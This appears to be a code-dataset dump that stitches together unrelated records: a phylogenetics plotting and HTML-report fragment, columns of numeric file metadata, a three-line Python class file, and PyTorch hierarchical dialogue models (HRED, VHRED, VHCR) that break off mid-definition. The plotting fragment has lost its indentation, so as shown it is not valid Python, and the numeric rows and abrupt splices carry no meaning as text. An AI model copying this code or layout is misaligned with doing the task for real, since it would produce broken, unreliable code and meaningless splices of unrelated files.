#inf_sites_frac = [ globs['aln-stats'][aln]['informative-sites'] / globs['aln-stats'][aln]['length'] for aln in aln_list ];
inf_sites_frac = [ inf_sites[i] / aln_lens[i] for i in range(len(aln_lens)) ];
plt.figure(figsize=(8,6));
plt.hist(inf_sites_frac, color=PC.coreCol(pal="wilke", numcol=1, offset=4)[0], bins="sturges", edgecolor="#999999");
#plt.boxplot(locus_len)
plt.xlim([0, 1]);
plt.xlabel("Fraction of sites that are informative");
plt.ylabel("# loci");
plt.savefig(inf_sites_frac_hist_file, dpi=100);
# Fraction of sites that are informative (hist)
####################
var_inf_sites_file = os.path.join(globs['plot-dir'], globs['var-inf-sites-plot-file']);
slope, intercept = np.polyfit(var_sites, inf_sites, 1);
inf_sites_pred = np.polyval([slope, intercept], var_sites);
plt.figure(figsize=(8,6));
plt.plot(var_sites, inf_sites_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
plt.scatter(var_sites, inf_sites, color=PC.coreCol(pal="wilke", numcol=1, offset=5)[0], alpha=0.25);
plt.xlabel("# of variable sites");
plt.ylabel("# of informative sites");
plt.savefig(var_inf_sites_file, dpi=100);
# Variable sites vs. informative sites (scatter w regression)
####################
if globs['run-mode'] == 'adaptive':
avg_scf_hist_file = os.path.join(globs['plot-dir'], globs['avg-scf-hist-file']);
avg_scf = [ globs['aln-stats'][aln]['node-scf-avg'] for aln in aln_list if globs['aln-stats'][aln]['node-scf-avg'] != "NA" ];
plt.figure(figsize=(8,6));
plt.hist(avg_scf, color=PC.coreCol(pal="wilke", numcol=1, offset=6)[0], bins="sturges", edgecolor="#999999");
plt.xlim([0, 1]);
plt.xlabel("Avg. sCF across all branches per locus");
plt.ylabel("# loci");
plt.savefig(avg_scf_hist_file, dpi=100);
# Avg. scf per locus (hist)
####################
low_scf_hist_file = os.path.join(globs['plot-dir'], globs['low-scf-hist-file']);
perc_low_scf = [ globs['aln-stats'][aln]['perc-low-scf-nodes'] for aln in aln_list if globs['aln-stats'][aln]['perc-low-scf-nodes'] != "NA" ];
plt.figure(figsize=(8,6));
plt.hist(perc_low_scf, color=PC.coreCol(pal="wilke", numcol=1, offset=7)[0], bins="sturges", edgecolor="#999999");
plt.xlim([0, 1]);
plt.xlabel("% of branches with sCF below " + str(globs['min-scf']) + " per locus");
plt.ylabel("# loci");
plt.savefig(low_scf_hist_file, dpi=100);
# % of branches with low sCF per locus (hist)
####################
scf_tree_file = os.path.join(globs['plot-dir'], globs['scf-tree-plot-file']);
# The file to save the species tree figure
tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True, keep_tp_label=True);
for node in globs['scf']:
tree_str = tree_str.replace(node, node + "_" + str(round(globs['scf'][node]['avg-quartet-scf'], 2)));
# For every node in the tree, add the averaged scf value over all loci to the label
tree_str = re.sub("<[\d]+>[_]?", "", tree_str);
#tree_str = re.sub("<[\d]+>", "", tree_str);
#print(tree_str);
# Re-add branch lengths and remove labels to the input tree for plotting
handle = StringIO(tree_str);
tree = Phylo.read(handle, "newick");
# Parse the tree string with Bio
# for clade in tree.get_terminals():
# if clade.name in globs['targets']:
# clade.color = branch_cols[0];
# target_lg = lines([0], [0], label="Targets", color = branch_cols[0]);
# elif clade.name in globs['conserved']:
# clade.color = branch_cols[1];
# conserve_lg = lines([0], [0], label="Conserved", color = branch_cols[1]);
# elif clade.name in globs['outgroup']:
# clade.color = branch_cols[2];
# outgroup_lg = lines([0], [0], label="Outgroup", color = branch_cols[2]);
# # Color the tip branches based on their input category and specify their legend entries
fig = plt.figure(figsize=(num_spec/2.54, 25.4/2.54));
# Specify the plot size depending on the number of species
axes = fig.add_subplot(1, 1, 1);
axes.axes.get_yaxis().set_visible(False);
axes.spines['left'].set_visible(False);
# Set the axes of the tree figure
Phylo.draw(tree, axes=axes, do_show=False);
# Draw the tree
# plt.legend(loc='upper left', handles=[target_lg, conserve_lg, outgroup_lg]);
# Add the legend
plt.savefig(scf_tree_file, dpi=100, bbox_inches='tight');
# Save the figure
#globs['scf-labeled-tree']
# scf tree (phylo)
####################
bl_scf_file = os.path.join(globs['plot-dir'], globs['bl-scf-plot-file']);
bls, scfs = [], [];
for node in globs['tree-dict']:
if globs['tree-dict'][node][2] != 'internal':
continue;
if node not in globs['scf']:
continue;
bls.append(float(globs['tree-dict'][node][0]));
scfs.append(globs['scf'][node]['avg-quartet-scf']);
# Gets the values out of their tables
slope, intercept = np.polyfit(bls, scfs, 1);
scfs_pred = np.polyval([slope, intercept], bls);
plt.figure(figsize=(8,6));
plt.plot(bls, scfs_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
plt.scatter(bls, scfs, color=PC.coreCol(numcol=1)[0], alpha=0.5);
plt.xlabel("Branch length");
plt.ylabel("sCF");
plt.savefig(bl_scf_file, dpi=100);
# Variable sites vs. informative sites (scatter w regression)
####################
#############################################################################
def writeHTMLPost(globs):
step = "Writing HTML summary file";
step_start_time = PC.report_step(globs, step, False, "In progress...");
# Status updated
# if not os.path.isdir(globs['html-dir']):
# shutil.copytree( os.path.join(globs['script-dir'], "html"), globs['html-dir'] );
# Copy the associated html files (stylesheets, images) from the provided template folders
# if globs['run-mode'] == 'adaptive':
# comment_start = "";
# comment_end = "";
# else:
# comment_start = "<!-- This block is only used when run mode (-r) is adaptive";
# comment_end = "-->";
# # Some HTML blocks will be commented out depending on the run mode
# if globs['theta']:
# theta_comment_start = "";
# theta_comment_end = "";
# else:
# theta_comment_start = "<!-- This block is only displayed when --theta is specified";
# theta_comment_end = "-->";
# if globs['coal-tree-file']:
# coal_tree_comment_start = "";
# coal_tree_comment_end = "";
# else:
# coal_tree_comment_start = "<!-- This block is only displayed when -l is specified";
# coal_tree_comment_end = "-->";
comment_start = "<!--";
comment_end = "-->"
if globs['incomplete-batches']:
batch_comment_start = "";
batch_comment_end = "";
else:
batch_comment_start = "<!-- This block is only displayed if incomplete batches were detected";
batch_comment_end = "-->";
placeholder = "";
with open(globs['html-file'], "w") as htmlfile:
htmlfile.write(TEMPLATES_POST.htmlSummary().format(
# mod_file=os.path.abspath(globs['mod-file']),
run_name=globs['run-name'],
run_time=globs['startdatetimenice'],
host_name=os.uname()[1],
script_call=globs['call'],
num_batches_complete_st=str(len(globs['complete-batches-st'])),
num_batches_complete_gt=str(len(globs['complete-batches-gt'])),
num_batches_incomplete_st=str(len(globs['incomplete-batches-st'])),
num_batches_incomplete_gt=str(len(globs['incomplete-batches-gt'])),
total_loci=str(len(globs['locus-stats']['elem_lik'])),
accelerated_loci=str(len(globs['accelerated-loci'])),
batch_size=str(globs['batch-size']),
procs_per_batch=str(globs['procs-per-batch']),
avg_runtime=str(round(PC.mean(globs['batch-runtimes']))),
batch_comment_start=batch_comment_start,
incomplete_batches=", ".join(globs['incomplete-batches']),
batch_comment_end=batch_comment_end,
log_file=globs['logfilename'],
results_folder=globs['outdir'],
bf1_hist=os.path.join("plots", globs['bf1-dist-file']),
bf2_hist=os.path.join("plots", globs['bf2-dist-file']),
bf1_bf2_plot=os.path.join("plots", globs['bf1-bf2-plot-file']),
comment_start=comment_start,
comment_end=comment_end,
#coal_tree_file=globs['coal-tree-file'],
num_spec=placeholder,
num_targets=placeholder,
num_conserved=placeholder,
num_outgroups=placeholder,
input_tree_plot=placeholder,
avg_aln_len=placeholder,
median_aln_len=placeholder,
avg_seq_len_nogap=placeholder,
med_seq_len_nogap=placeholder,
date_time=PC.getFooterDateTime(),
))
# Write the HTML summary file using the template
step_start_time = PC.report_step(globs, step, step_start_time, "Success");
globs['html-summary-written'] = True;
# Status update
return globs;
| 40.561905
| 150
| 0.599114
| 4,587
| 34,072
| 4.313277
| 0.084587
| 0.01304
| 0.019712
| 0.019712
| 0.870811
| 0.84003
| 0.81117
| 0.787617
| 0.780238
| 0.774223
| 0
| 0.023798
| 0.216864
| 34,072
| 840
| 151
| 40.561905
| 0.717685
| 0.262209
| 0
| 0.631841
| 1
| 0
| 0.177305
| 0.007654
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00995
| false
| 0
| 0.034826
| 0
| 0.052239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc01ea8195a47767f88ef0c918f85a0c274301f5
| 90
|
py
|
Python
|
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | 1
|
2018-04-29T04:40:25.000Z
|
2018-04-29T04:40:25.000Z
|
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | null | null | null |
actualizer/api/response.py
|
mcqueenjordan/actualizer
|
359642d90173b598b58af7b3da55d748abdca614
|
[
"MIT"
] | null | null | null |
class Response: pass
class LogResponse(Response): pass
class ListResponse(Response): pass
| 22.5
| 34
| 0.822222
| 11
| 90
| 6.727273
| 0.454545
| 0.486486
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 90
| 3
| 35
| 30
| 0.91358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
fc06465937e3d0ab551aeffda8404be01702f760
| 48,586
|
py
|
Python
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 163
|
2019-06-23T14:07:57.000Z
|
2022-02-25T23:06:07.000Z
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 8
|
2019-07-24T12:41:31.000Z
|
2022-02-10T00:17:20.000Z
|
model/models.py
|
UmaTaru/run
|
be29e4d41a4de3dee27cd6796801bfe51382d294
|
[
"MIT"
] | 31
|
2019-06-26T01:21:07.000Z
|
2021-09-06T17:23:24.000Z
|
import torch
import torch.nn as nn
from model.utils import to_var, pad, normal_kl_div, normal_logpdf, bag_of_words_loss, to_bow, EOS_ID, detokenize
import model.layers as layers
import numpy as np
VariationalModels = ['VHRED', 'VHCR']
class HRED(nn.Module):
def __init__(self, config):
super(HRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
if config.context_input_only:
context_input_size += (config.emo_output_size \
+ config.infersent_output_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.emotion:
self.context2emoji = layers.FeedForward(
config.context_size, config.emo_output_size,
num_layers=config.emo_num_layers,
hidden_size=config.emo_embedding_size,
activation=config.emo_activation)
if config.infersent:
self.context2infersent = layers.FeedForward(
config.context_size, config.infersent_output_size,
num_layers=config.infersent_num_layers,
hidden_size=config.infersent_embedding_size,
activation=config.infersent_activation,
no_activation_last_layer=True)
def forward(self, input_sentences, input_sentence_length,
input_conversation_length, target_sentences, decode=False,
extra_context_inputs=None, rl_mode=False):
"""
Args:
input_sentences: (Variable, LongTensor) [num_sentences, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
num_sentences = input_sentences.size(0)
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences, max_source_length, hidden_size * direction]
# encoder_hidden: [num_layers * direction, num_sentences, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(
input_sentences, input_sentence_length)
# encoder_hidden: [num_sentences, num_layers * direction * hidden_size]
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1])), 0)
# encoder_hidden: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l), max_len)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
context_inputs, input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# Stop gradients from flowing from discriminator if only using input
if self.config.context_input_only:
discriminator_input = context_outputs.detach()
else:
discriminator_input = context_outputs
# Predict emojis using discriminator.
emoji_preds = None
if self.config.emotion:
emoji_preds = self.context2emoji(discriminator_input)
# Predict infersent using discriminator.
infersent_preds = None
if self.config.infersent:
infersent_preds = self.context2infersent(discriminator_input)
# project context_outputs to decoder init state
decoder_init = self.context2decoder(context_outputs)
# [num_layers, batch_size, hidden_size]
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if rl_mode or not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, emoji_preds, infersent_preds
else:
# decoder_outputs = self.decoder(target_sentences,
# init_h=decoder_init,
# decode=decode)
# return decoder_outputs.unsqueeze(1)
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# Get top prediction only
# [batch_size, max_unroll]
# prediction = prediction[:, 0]
# [batch_size, beam_size, max_unroll]
return prediction, emoji_preds, infersent_preds
def generate(self, context, sentence_length, n_context,
extra_context_inputs=None, botsent=None, botmoji=None,
vocab=None):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
context_inputs_2d = raw_encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
decoder_init = self.context2decoder(context_outputs)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
length)
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
# Dynamically assess the DeepMoji and Infersent predictions on
# generated text
if self.config.context_input_only:
dynamic_context_inputs = dynamically_assess_context_inputs(
prediction, botmoji, botsent, vocab, self.config)
context_inputs_2d = torch.cat(
(context_inputs_2d, dynamic_context_inputs), 1)
context_outputs, context_hidden = self.context_encoder.step(
context_inputs_2d, context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHRED(nn.Module):
def __init__(self, config):
super(VHRED, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
posterior_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions
+ config.context_size)
if config.context_input_only:
context_input_size += (config.emo_output_size
+ config.infersent_output_size)
posterior_input_size += (config.emo_output_size
+ config.infersent_output_size)
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.prior_h = layers.FeedForward(config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_h = layers.FeedForward(posterior_input_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.bow:
self.bow_h = layers.FeedForward(config.z_sent_size,
config.decoder_hidden_size,
num_layers=1,
hidden_size=config.decoder_hidden_size,
activation=config.activation)
self.bow_predict = nn.Linear(config.decoder_hidden_size, config.vocab_size)
if config.emotion:
self.context2emoji = layers.FeedForward(
config.context_size, config.emo_output_size,
num_layers=config.emo_num_layers,
hidden_size=config.emo_embedding_size,
activation=config.emo_activation)
if config.infersent:
self.context2infersent = layers.FeedForward(
config.context_size, config.infersent_output_size,
num_layers=config.infersent_num_layers,
hidden_size=config.infersent_embedding_size,
activation=config.infersent_activation,
no_activation_last_layer=True)
def prior(self, context_outputs):
# Context dependent prior
h_prior = self.prior_h(context_outputs)
mu_prior = self.prior_mu(h_prior)
var_prior = self.softplus(self.prior_var(h_prior))
return mu_prior, var_prior
def posterior(self, context_outputs, encoder_hidden):
h_posterior = self.posterior_h(torch.cat([context_outputs, encoder_hidden], 1))
mu_posterior = self.posterior_mu(h_posterior)
var_posterior = self.softplus(self.posterior_var(h_posterior))
return mu_posterior, var_posterior
def compute_bow_loss(self, target_conversations):
target_bow = np.stack([to_bow(sent, self.config.vocab_size) for conv in target_conversations for sent in conv], axis=0)
target_bow = to_var(torch.FloatTensor(target_bow))
bow_logits = self.bow_predict(self.bow_h(self.z_sent))
bow_loss = bag_of_words_loss(bow_logits, target_bow)
return bow_loss
def forward(self, sentences, sentence_length, input_conversation_length,
target_sentences, decode=False, extra_context_inputs=None,
rl_mode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
context_inputs = torch.stack([pad(context_inputs_2d.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs_inference = context_inputs[:, 1:, :]
context_inputs_inference_flat = torch.cat(
[context_inputs_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
context_inputs_input = context_inputs[:, :-1, :]
# context_outputs: [batch_size, max_len, context_size]
context_outputs_with_targets, context_last_hidden = self.context_encoder(
context_inputs_input, input_conversation_length)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs_with_targets[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
# Stop gradients from flowing from discriminator if only using input
if self.config.context_input_only:
discriminator_input = context_outputs.detach()
else:
discriminator_input = context_outputs
# Predict emojis using discriminator.
emoji_preds = None
if self.config.emotion:
emoji_preds = self.context2emoji(discriminator_input)
# Predict sentence embeddings using discriminator
infersent_preds = None
if self.config.infersent:
infersent_preds = self.context2infersent(discriminator_input)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
if not rl_mode and not decode:
mu_posterior, var_posterior = self.posterior(
context_outputs, context_inputs_inference_flat)
z_sent = mu_posterior + torch.sqrt(var_posterior) * eps
log_q_zx = normal_logpdf(z_sent, mu_posterior, var_posterior).sum()
log_p_z = normal_logpdf(z_sent, mu_prior, var_prior).sum()
# kl_div: [num_sentneces]
kl_div = normal_kl_div(mu_posterior, var_posterior,
mu_prior, var_prior)
kl_div = torch.sum(kl_div)
else:
z_sent = mu_prior + torch.sqrt(var_prior) * eps
kl_div = None
# Manager action. Detach since it's a sampled action.
# Gradients flow through mu and Sigma but not z
log_p_z_sent = normal_logpdf(z_sent.detach(), mu_prior, var_prior)
log_p_z = log_p_z_sent.sum()
log_q_zx = None
self.z_sent = z_sent
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if rl_mode and decode:
# VHRL or REINFORCE step
# prediction: [num_sents, max_sent_len]
# word_probs: [num_sents, max_sent_len]
prediction, word_probs = self.decoder(inputs=None,
init_h=decoder_init,
decode=decode,
return_probs=True)
return (prediction, kl_div, log_p_z, log_q_zx,
emoji_preds, infersent_preds, word_probs, log_p_z_sent)
elif rl_mode or not decode:
# Batch RL step or MLE pre-training step
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return (decoder_outputs, kl_div, log_p_z, log_q_zx,
emoji_preds, infersent_preds)
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(
init_h=decoder_init)
return (prediction, kl_div, log_p_z, log_q_zx,
emoji_preds, infersent_preds)
def generate(self, context, sentence_length, n_context,
extra_context_inputs=None, botmoji=None, botsent=None,
vocab=None):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
context_hidden=None
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, raw_encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
if self.config.context_input_only:
context_inputs_2d = torch.cat(
(context_inputs_2d, extra_context_inputs), 1)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.prior(context_outputs)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, raw_encoder_hidden = self.encoder(prediction,
length)
context_inputs_2d = raw_encoder_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
# Dynamically assess the DeepMoji and Infersent predictions on
# generated text
if self.config.context_input_only:
dynamic_context_inputs = dynamically_assess_context_inputs(
prediction, botmoji, botsent, vocab, self.config)
context_inputs_2d = torch.cat(
(context_inputs_2d, dynamic_context_inputs), 1)
context_outputs, context_hidden = self.context_encoder.step(context_inputs_2d,
context_hidden)
samples = torch.stack(samples, 1)
return samples
class VHCR(nn.Module):
def __init__(self, config):
super(VHCR, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_inference_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions)
posterior_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions
+ config.context_size
+ config.z_conv_size)
if config.context_input_only:
context_inference_size += (config.emo_output_size
+ config.infersent_output_size)
posterior_input_size += (config.emo_output_size
+ config.infersent_output_size)
context_encoder_size = context_inference_size + config.z_conv_size
self.context_encoder = layers.ContextRNN(context_encoder_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.unk_sent = nn.Parameter(torch.randn(context_encoder_size - config.z_conv_size))
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
self.context_inference = layers.ContextRNN(context_inference_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
self.context2decoder = layers.FeedForward(
config.context_size + config.z_sent_size + config.z_conv_size,
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(
config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size,
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_h = layers.FeedForward(
posterior_input_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
if config.emotion:
self.context2emoji = layers.FeedForward(
config.context_size, config.emo_output_size,
num_layers=config.emo_num_layers,
hidden_size=config.emo_embedding_size,
activation=config.emo_activation)
if config.infersent:
self.context2infersent = layers.FeedForward(
config.context_size, config.infersent_output_size,
num_layers=config.infersent_num_layers,
hidden_size=config.infersent_embedding_size,
activation=config.infersent_activation,
no_activation_last_layer=True)
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
def sent_prior(self, context_outputs, z_conv):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
def sent_posterior(self, context_outputs, encoder_hidden, z_conv):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length, input_conversation_length,
